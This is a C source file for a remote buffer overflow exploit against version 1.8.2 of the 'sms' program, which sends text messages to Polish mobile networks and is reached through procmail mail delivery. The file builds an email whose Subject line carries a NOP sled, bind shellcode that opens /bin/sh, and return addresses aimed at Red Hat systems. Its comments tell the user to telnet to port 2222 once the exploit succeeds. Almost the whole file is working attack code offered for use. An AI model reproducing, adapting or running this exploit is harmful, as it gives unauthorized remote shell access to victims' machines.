/* * sms, wersja: 1.8.2, * Wysylanie wiadomosci na telefony sieci Era, Plus GSM i Idea Centertel. * * *REMOTE EXPLOIT* * * (c) 2000 babcia padlina / buffer0verfl0w security (b0f.freebsd.lublin.pl) * * Send mail generated by program. After successfull exploiting, telnet * to port 2222. * * Sometimes adjusting parameter BUFSIZE may be useful. It depends on * procmail script configuration. */ #include #include #include #include #define NOP 0x90 #define OFS 0 #define BUFSIZE 914 #define ADDRS 8 #define RET 0xbffff970 /* most redhat boxes */ static const char rcsid[] = "$Id: sms.c,v 1.1.1.1 2001/05/21 15:28:06 venglin Exp $"; char shell[] = /* duke bind shellcode */ "\xeb\x10\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xc3\x31\xc0\xb0\x01\xcd" "\x80\xc3\xe8\xeb\xff\xff\xff\xb0\x06\xcd\x80\xb0\x06\xfe\xc3\xcd" "\x80\xb0\x06\xfe\xc3\xcd\x80\xb0\x02\xcd\x80\x39\xc1\x75\xdc\xe8" "\xce\xff\xff\xff\xb0\x02\xb1\x01\xb2\x06\x52\x51\x50\xb3\x01\xb0" "\x66\x89\xe1\xcd\x80\x89\xc6\xe8\xb6\xff\xff\xff\x83\xc4\x12\x50" "\xb9\x02\xff\x08\xae\x30\xed\x51\x89\xe2\x83\xec\x06\xb0\x10\x50" "\xb3\x02\x52\x56\xb0\x66\x89\xe1\xcd\x80\xb0\x10\x50\x56\xb0\x66" "\xb3\x04\x89\xe1\xcd\x80\xe8\x87\xff\xff\xff\x50\x50\x56\xb0\x66" "\xb3\x05\x89\xe1\xcd\x80\x31\xc9\x88\xc3\xb0\x29\xcd\x80\xb0\x3f" "\xcd\x80\xeb\x16\x5e\x88\x4e\x07\x89\x76\x08\x89\x4e\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe5\xff\xff\xff" "/bin/sh"; int main(argc, argv) int argc; char **argv; { char *buf, *p; int noplen, i, ofs; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+ADDRS+10))) { perror("malloc()"); return -1; } if (argc > 1) ofs = atoi(argv[1]); else ofs = OFS; ret = RET + ofs; noplen = BUFSIZE - strlen(shell); memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, shell); p = buf + noplen + strlen(shell); ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf)); printf("Return-Path: @\n"); printf("Subject: %s\n\n", buf); return 0; }